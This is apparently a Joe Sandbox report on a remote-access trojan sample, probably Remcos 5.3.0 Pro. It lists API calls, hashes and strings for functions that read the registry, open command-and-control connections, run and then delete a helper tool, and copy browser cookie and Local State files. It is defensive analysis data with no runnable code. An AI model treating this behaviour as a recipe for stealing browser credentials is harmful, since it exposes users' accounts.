                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5c6fa1c002a9720762430db8fb11c71e5babb0f14bac1e1abc3ef700af00d394
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9e22a5ea04466266cf9748a27aa36caa1ba497c442adaf70788f175e8c3459b2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c6fa1c002a9720762430db8fb11c71e5babb0f14bac1e1abc3ef700af00d394
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87218F7A944308ABD721EA649C4CF9B7B9CEF84714F040D2AB958D31D0EB30D6158BD6
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                                                                                                                                                                                              • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                                                                                                                                                                                                                                              • API String ID: 2281282204-3981147832
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 44b1d2c152bb9255bdf401e2d89c1c425db5076c8a15731edfcb727ca5984d46
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 5cf4e9032f47a3efac01ff8ef37086889acd92013af90c8396a8a4e29292548f
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44b1d2c152bb9255bdf401e2d89c1c425db5076c8a15731edfcb727ca5984d46
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B21A131B0031027C608767A891BA6F359A9B91719F90443EF805A72D7EE7D8A6083DF
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                                                                                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3525466593-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 8d6069787765cd8089b920b9a1774e70d04059e2b0db351aafb66b48fc3d0dee
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3161C370200301ABD720DF66C981BA77BA6BF44744F04411AF9058B786EBF8E8C5CB99
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
                                                                                                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
                                                                                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Create$EventLocalThreadTime
                                                                                                                                                                                                                                                                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2532271599-1507639952
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326D2,00000024,?,?,?), ref: 0043295C
                                                                                                                                                                                                                                                                                                                              • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBCE,?), ref: 00432972
                                                                                                                                                                                                                                                                                                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBCE,?), ref: 00432984
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1815803762-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7CF
                                                                                                                                                                                                                                                                                                                              • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7E7
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Name$ComputerUser
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 4229901323-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A30,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: recv
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1507349165-0

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: Connection: Upgrade$ERROR: Could not parse WebSocket url: %s$ERROR: Got bad status connecting to %s: %s$ERROR: Got invalid status line connecting to: %s$GET /%s HTTP/1.1$HTTP/1.1 %d$Host: %s$Host: %s:%d$Origin: %s$P$Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==$Sec-WebSocket-Version: 13$Unable to connect to %s:%d$Upgrade: websocket$e$ws://%[^:/]$ws://%[^:/]/%s$ws://%[^:/]:%d$ws://%[^:/]:%d/%s
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-1585909395
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 12572963b92fc2fbb6932ee6605c50527e2d8c00a7f48e67dae44c0a149c157e
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 8c5c428c0198e8a7c9dce20c2a40cf958e763ea39fc21358b4929ecef954cfc7
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12572963b92fc2fbb6932ee6605c50527e2d8c00a7f48e67dae44c0a149c157e
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FE1F1B5900214AEFB14CF64DC85FEEB7B8EB05394F848195F609A7086D372AB49CF64

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                                                                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 00414249
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,00000002), ref: 00414B88
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Sleep$ErrorLastLocalTime
                                                                                                                                                                                                                                                                                                                              • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$TLS Off$TLS On $TUF$XCG$XCG$XCG$`=G$dCG$fyhstga-ONSWMZ$hlight$name$>G$>G$BG
                                                                                                                                                                                                                                                                                                                              • API String ID: 524882891-758395017
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 535ab475a5e7f065e9ffb8840f1f7c82a23e43134cf4f3e82dceb6296a1bb615
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 1c0fcd5d2769b0c1ed3f5537d8c306574ebe830810c6f13c8178cbf41d879861
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 535ab475a5e7f065e9ffb8840f1f7c82a23e43134cf4f3e82dceb6296a1bb615
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B525E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,10006E4E), ref: 10007252
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 1000725B
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,10006E4E), ref: 1000726C
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 1000726F
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,10006E4E), ref: 10007286
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 10007289
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,10006E4E), ref: 1000729A
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 1000729D
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,10006E4E), ref: 100072AE
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 100072B1
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,10006E4E), ref: 100072C2
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 100072C5
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                                                                                                                                                                                                              • String ID: GetFinalPathNameByHandleW$NtQueryInformationProcess$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$Rstrtmgr$Rstrtmgr$Rstrtmgr$kernel32$ntdll
                                                                                                                                                                                                                                                                                                                              • API String ID: 4236061018-788455005
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 15c6b04f8a56a6077895a4e2c88de4e1754fac2b079e60f4a3e8d9701f116bca
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 04275e680396dfb4a641f74b6e8e1366635206651eabc041964a765234593f91
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15c6b04f8a56a6077895a4e2c88de4e1754fac2b079e60f4a3e8d9701f116bca
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38111F74C01228E9FA61FBF19CEDFA73A98FB40290FA10416F60953060C738564ADF94

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,00000000,000000FF,?,00000000), ref: 10001F5F
                                                                                                                                                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 10001FA8
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CopyCreateDirectoryFile
                                                                                                                                                                                                                                                                                                                              • String ID: Network$User Data$\Cookies$\Local State$\Local State$\Network\Cookies$\Secure Preferences$\Secure Preferences$invalid vector<T> subscript$-
                                                                                                                                                                                                                                                                                                                              • API String ID: 3761107634-3418363220
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 6543eb47e2eb3d4cb808ab73e9c761b45a59b7d1ab0deb3a85e919aee3a5a40f
                                                                                                                                                                                                                                                                                                                              • Instruction ID: d59edb435599a471555a78990484bb1f50df8ad1d5918936d629013e8b7aebb2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6543eb47e2eb3d4cb808ab73e9c761b45a59b7d1ab0deb3a85e919aee3a5a40f
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20028AB0D002189FEF04CFA4DC85BEEBBB5FF58344F114499E80AAB255DB74AA85CB51

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                                                                                                                                                                                                                              • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                                                                                                                                                                                                                                              • API String ID: 1223786279-3931108886
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 777e3ae233bcc939c22c45d816be283afa53ecf355b2f9b7940a84ed0f82c418
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 0ab8a3329a483972d05e881652f5f37e7f84d863b53285be69f93207c3ffadf7
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 777e3ae233bcc939c22c45d816be283afa53ecf355b2f9b7940a84ed0f82c418
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 890243311083414AC325FB61D891AEFB7D5AFD4308F50493FF98A931E2EF785A49C69A

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 02831434
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028310F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 02831137
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028310F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 02831151
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0283115C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0283116D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028310F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0283117C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028310F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 02831193
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028310F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 028311D0
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028310F1: FindClose.KERNEL32(00000000), ref: 028311DB
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 028314C5
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 028314E0
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 0283150F
                                                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 02831521
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 02831547
                                                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 02831553
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 02831579
                                                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 02831585
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 028315AB
                                                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 028315B7
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
